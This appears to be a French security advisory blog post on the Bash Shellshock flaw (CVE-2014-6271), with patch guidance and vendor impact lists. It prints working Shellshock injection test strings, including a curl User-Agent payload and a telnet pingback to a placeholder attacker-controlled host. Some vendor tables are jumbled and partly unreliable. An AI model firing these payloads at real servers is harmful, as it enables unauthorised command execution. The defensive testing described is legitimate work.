Vulnérabilité critique sur Bash: (CVE-2014-6271 / Shellshock)

Vulnérabilité critique sur Bash: (CVE-2014-6271 / Shellshock)

Une nouvelle vulnérabilité critique CVE-2014-6271 a été publiée le 24/09 par Stéphane Chazelas dans le célèbre shell linux Bash. Cette dernière a été surnommée Shellshock et permet d’injecter des commandes systèmes à distance.

Cet Interprète de commande est présent sur la grande majorité des distributions Linux et est le composant sous-jacent d’une large majorité de programme, notamment des programmes CGI beaucoup utilisés par les applications WEB. C’est pourquoi, bien souvent, il est possible d’éxécuter des commandes a distance ce qui est sûrement pour beaucoup responsable du score maximum dans la notation de l’impact et exploitabilité de la vulnérabilité.

GNU Bash jusqu’à sa version 4.3, traite les chaînes de caractères suivant une définition de fonctions dans les variables d’environnement.

Ainsi, si la ligne de code suivante (lancée localement sur votre serveur) affiche « VULN« , cela indique que votre version de bash est impactée par la vulnérabilitée.

$ env var='() { ignore this;}; echo VULN’ bash -c /bin/true  

Cela ne veut pas pour autant dire que cette vulnérabilité est exploitable. En effet, pour pouvoir être exploitée à distance, il faut qu’un vecteur d’attaque permettant de faire le lien entre les données malicieuses envoyées par l’utilisateur et l’instance de bash. Un environnement de scripts CGI(mod_cgi, fastcgi) est le vecteur plus couramment rencontré.

Si un serveur donné est vulnérable, il faut désormais tester s’il est exploitable. Pour ce faire, on peut par exemple lancer la commande suivante à partir d’un système connecté à Internet:

$ curl -A « () { :; }; echo VULN » {URL}

Si la réponse du serveur contient « VULN » alors la réponse du serveur contiendra VULN.

En revanche, l’absence de ce message ne signifie pas une absence de VULN. Il n’y a pas de moyen infaillible (sans faux-négatifs) de détecter la présence de cette vulnérabilité. Néanmoins, en utilisant un pingback comme payload envoyé au serveur, on a, dans la grande majorité des cibles vulnérables, une réponse positive.

Ci-dessous, on peut voir la connexion TCP de notre cible de test vers un serveur internet nous appartenant. Le payload injecté est affiché ci-dessous:

telnet <serveur_internet_sous_notre_controle> 8888

 

Shellshock Pingback TCP proof-of-concept

Shellshock Pingback TCP proof-of-concept

Enfin, il existe des solutions près à l’emploi, pour tester la vulnérabilité du site à partir d’un serveur internet. Elles offrent un confort d’utilisation mais n’ont finalement que peu de valeur ajoutée par rapport au test précédent. Aussi, elles seront surtout réservées à ceux qui sont vraiment allergiques à la ligne de commande.

La plateforme de test paraissant la plus sérieuse est accessible à l’adresse suivante https://shellshocker.net/.

 

Le premier patch publié n’a pas permis de combler complètement la vulnérabilité ce qui a conduit a une nouvelle vulnérabilité. Parallèlement, de nombreuses autres vulnérabilités similaires ont été découvertes dans la lancée:

CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

Ces vulnérabilités ont été regroupées de manière non-officielle sous le nom d’AfterShock.

 

Depuis, des patchs de meilleure facture sont apparus pour la plupart des distributions Linux et corrigent efficacement cette possibilité d’injecter des commandes systèmes.

Voici quelques informations pour corriger cette vulnérabilité :

  • Distributions basés sur apt-get (Ubuntu, Debian, …):   # apt-get install --only-upgrade bash

 

  • Equippement/Machine dans le même cas que ci-dessus mais n’ayant pas la possibilité de recompiler les sources : PAS DE SOLUTION

 

  • Juniper:
    • Produits vulnérables devant appliqués les patchs de Juniper (corrigeant pour le moment uniquement CVE-2014-6271)  http://www.juniper.net/support/downloads/ :
      • Junos Space
      • JSA Series (STRM)
      • NSM Appliances (NSM3000 and NSMExpress)

 

    • Produits utilisant bash mais non-vulnérables:
      • SSL VPN
      • UAC
      • CTPView
      • QFabric
      • DDOS Secure
      • JWAS
      • vGW
      • SRC
      • Junos Pulse Endpoint Profiler

 

    • Produits non concernés :
      • Junos OS
      • ScreenOS
      • JunosE
      • ADC
      • SRX-IDP
      • ISG-IDP
      • WX
      • MFC

 

Network Application, Service, and Acceleration

Network and Content Security Devices

      • Cisco Identity Services Engine (ISE) [CSCur00532]
      • Cisco Intrusion Prevention System Solutions (IPS) [CSCur00552]
      • Cisco Secure Access Control Server (ACS) [CSCur00511]

Network Management and Provisioning

    • Cisco Unified Intelligence Center (UIC) [CSCur02891]

Routing and Switching – Enterprise and Service Provider

Unified Computing

Voice and Unified Communications Devices

      • Cisco Unified Communications Manager Session Management Edition (SME) [CSCur00930]

Video, Streaming, TelePresence, and Transcoding Devices

      • Cisco Edge 300 Digital Media Player [CSCur02761]
      • Cisco Edge 340 Digital Media Player [CSCur02751]
      • Cisco Insight reporter [CSCur04977]
      • Cisco TelePresence Conductor [CSCur02103]
      • Cisco TelePresence IP Gateway Series [CSCur04984]
      • Cisco TelePresence IP VCR Series [CSCur04993]
      • Cisco TelePresence ISDN GW 3241 [CSCur05010]
      • Cisco TelePresence ISDN GW MSE 8321 [CSCur05010]
      • Cisco TelePresence ISDN Link [CSCur05025]
      • Cisco TelePresence Video Communication Server (VCS/Expressway) [CSCur01461]
      • Cisco TelePresence endpoints (C series, EX series, MX series, MXG2 series, SX series) and the 10″ touch panel [CSCur02591]
      • Tandberg Codian ISDN GW 3210/3220/3240 [CSCur05010]
      • Tandberg Codian MSE 8320 model [CSCur05010]

 

    • Produits non vulnérables:
      • Cisco Adaptive Security Appliance (ASA)
      • Cisco IOS
      • Cisco IOS-XR running on
        • Cisco ASR 9000 Series Aggregation Services Routers
        • Cisco CRS Router
        • Cisco XR 12000 Series Router
      • Cisco IronPort ESA/SMA
      • Cisco Private Internet eXchange (PIX)
      • Cisco Sourcefire Defense Center and Sensor products
      • Cisco Wireless LAN Controller (WLC)

 

  • F5:
    Les utilisateurs d’équippements réseaux F5 devront suivre les recommdations et utilisé la solution F5 pour leur équippement http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html

    Product Versions non vulnérables Versions vulnérables Composant vulnérable
    BIG-IP LTM 11.0.0 – 11.6.0
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP AAM 11.4.0 – 11.6.0 None Bash shell
    BIG-IP AFM 11.3.0 – 11.6.0 None Bash shell
    BIG-IP Analytics 11.0.0 – 11.6.0 None Bash shell
    BIG-IP APM 11.0.0 – 11.6.0
    10.1.0 – 10.2.4
    None Bash shell
    BIG-IP ASM 11.0.0 – 11.6.0
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP Edge Gateway 11.0.0 – 11.3.0
    10.1.0 – 10.2.4
    None Bash shell
    BIG-IP GTM 11.0.0 – 11.6.0
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP Link Controller 11.0.0 – 11.6.0
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP PEM 11.3.0 – 11.6.0 None Bash shell
    BIG-IP PSM 11.0.0 – 11.4.1
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP WebAccelerator 11.0.0 – 11.3.0
    10.0.0 – 10.2.4
    None Bash shell
    BIG-IP WOM 11.0.0 – 11.3.0
    10.0.0 – 10.2.4
    None Bash shell
    ARX 6.0.0 – 6.4.0 None Bash shell
    Enterprise Manager 3.0.0 – 3.1.1
    2.1.0 – 2.3.0
    None Bash shell
    FirePass None 7.0.0
    6.0.0 – 6.1.0
    None
    BIG-IQ Cloud 4.0.0 – 4.4.0 None Bash shell
    BIG-IQ Device 4.2.0 – 4.4.0 None Bash shell
    BIG-IQ Security 4.0.0 – 4.4.0 None Bash shell
    LineRate None 2.4.0 – 2.4.1
    2.3.0 – 2.3.1
    2.2.0 – 2.2.4
    1.6.0 – 1.6.3
    None

 

  • Websense
  • Produit                           Statut
    Proxy                           Vulnerable
    Data Security Suite                           Vulnerable
    Data Endpoints                           Vulnerable
    Data Security Suite                           Vulnerable
    Data Enda                           Vulnerable
    Email Security Gateway                           Vulnerable
    Email Log Server                           Vulnerable
    Email Anywhere                           Vulnerable
    Email Security Gateway                           Vulnerable
    Email Log Server                           Vulnerable
    V-Series Appliances                           Vulnerable
    X-Series Appliances                           Vulnerable

 

  • Trend Micro
Product               Status
Trend Micro – Gateway products. IWSVA/IMSVA            Vulnerable
OfficeScan             non vulnerable
Control Manager             non vulnerable
Deep Security             Vulnerable

 

  • McAfee
Produit               Statut
SIEM               Vulnerable
MWG               Vulnerable
NGFW               Vulnerable
MFE               Vulnerable